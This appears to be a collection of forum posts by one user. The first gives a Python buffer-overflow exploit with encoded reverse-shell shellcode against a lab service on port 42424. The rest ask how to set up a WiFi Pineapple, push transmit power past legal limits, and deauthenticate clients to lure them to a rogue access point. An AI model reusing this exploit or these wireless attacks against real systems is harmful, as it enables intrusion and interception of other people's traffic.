confuscious1080

Hi I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and i can get a reverse meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However when I attempt this in the test environment against the machine that I know is running the application on port 42424 I do not get the reverses shell now i have tried this with both x86 and x64 shellcode, if i test locally on the Kali machine i can crash the application but again also do not get a shell my exploit code is below #!/usr/bin/env python2 import socket ServiceManagerIP = "127.0.0.1" ServiceManagerPort = 42424 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ServiceManagerIP, ServiceManagerPort)) payload = "\xc3"*146 #Junk Bytes #77E9F7DF payload += "\xDF\xF7\xE9\x77" + "\x90" *16 #Shellcode to be executed by application payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1" "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7" "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17" "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05" "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40" "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92" "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a" "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4" "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b" "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb" "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38" "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7" "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80" "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5" "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a" "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3" "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c" "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa" "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d" "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80" "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb" "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62" "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75" "\x35\x96\xaf\x2a\x36\xb3") s.send(payload+"\r\n") data = s.recv(len(msg)) s.recv(1024) s.close() print data

Ah okay thanks a lot for your help

do you know where i can order this in the UK i presume from the ALFA site shipping from the Hak5 store takes ages as its coming from America

Oh so this is what I needed an actual amplfier lol i just ordered two of the 7dbi alfa antennas and made no difference I will also buy this additional amplifier as well

Ah okay well I also followed the instructions and ran the tx power unlocker script but it has not worked or upgraded the txpower at all for any interface.

Checked my Free Wifi Access Point as well that my clients will connect to which I guess is the actual one that matters and the signal strength for that is only 18 dbmi I live in the UK could this be because of law restrictions have to be under 20 dbmi??

When I connect to my Management AP of the Wifi Pineapple not the one configured for clients to connect to i only have a signal strength of 26 dbm compared to my actual BT router access point which is at 65 dbm this is also with one of the Alfa 7dbi antennas connected up to the Wifi Pineapple

Ah yes that makes sense that having a bigger antenna will not increase the chipsets output power for the device is there a way to increase this as well in Kali Linux ive tried the whole iw reg thing with the command line but I have my suspicions that it is not actually doing anything

My tx power is still 22 dbm as well on the wlan0 interface in Kali got the antenna working how do I take advantage of the 7bi that I have

Hi I recently got one of these from ebay to go on my NANO Basic piece of kit. I noticed that they sell them on the Hak5 website as well. So I took off the basics antenna and put on the alpha and ran the shell script to configure the pineapple got the site address logged in tried a recon scan and nothing at all could not scan, is their something else I need to do to configure it the antenna came with no drivers or anything i thought i could just screw it on the Pineapple and I would be away.

nope i just have the Pineapple not the SD card that comes with it yeah think its because ive run out of space on the Pineapple

I have my android device connected up now been using DWALL on it trying to use nmap but for some reason the Pineapple will not install the dependencies

But i thought if you could deauth a MAC off of a router first then you could get them to connect to you afterwards

So I have this set up at home at the moment all configured changed the option that hides the access point in networking Have Pine AP daemon, logging, associations and everything running Firstly the recon tool does not seem that great at all all the access points i scan for in recon are -98 signal strength when I do finally manage to get a client to show with the access point. I try and deauth it It says action completed successfully then what none of them seem to reconnect to my Pineapple Nano, I can definetly see my labelled network SSID in connections when I try and connect to my own wifi nano it asks me for the key I made to login surely it would do that for any clients trying to connect ask for that key am I missing something here

now im having a problem deauthing clients connected to the access points firstly when I recon scan i get a few SSID access points but no clients and when i try and deauth command on the access point it says please resatrt the Pineapple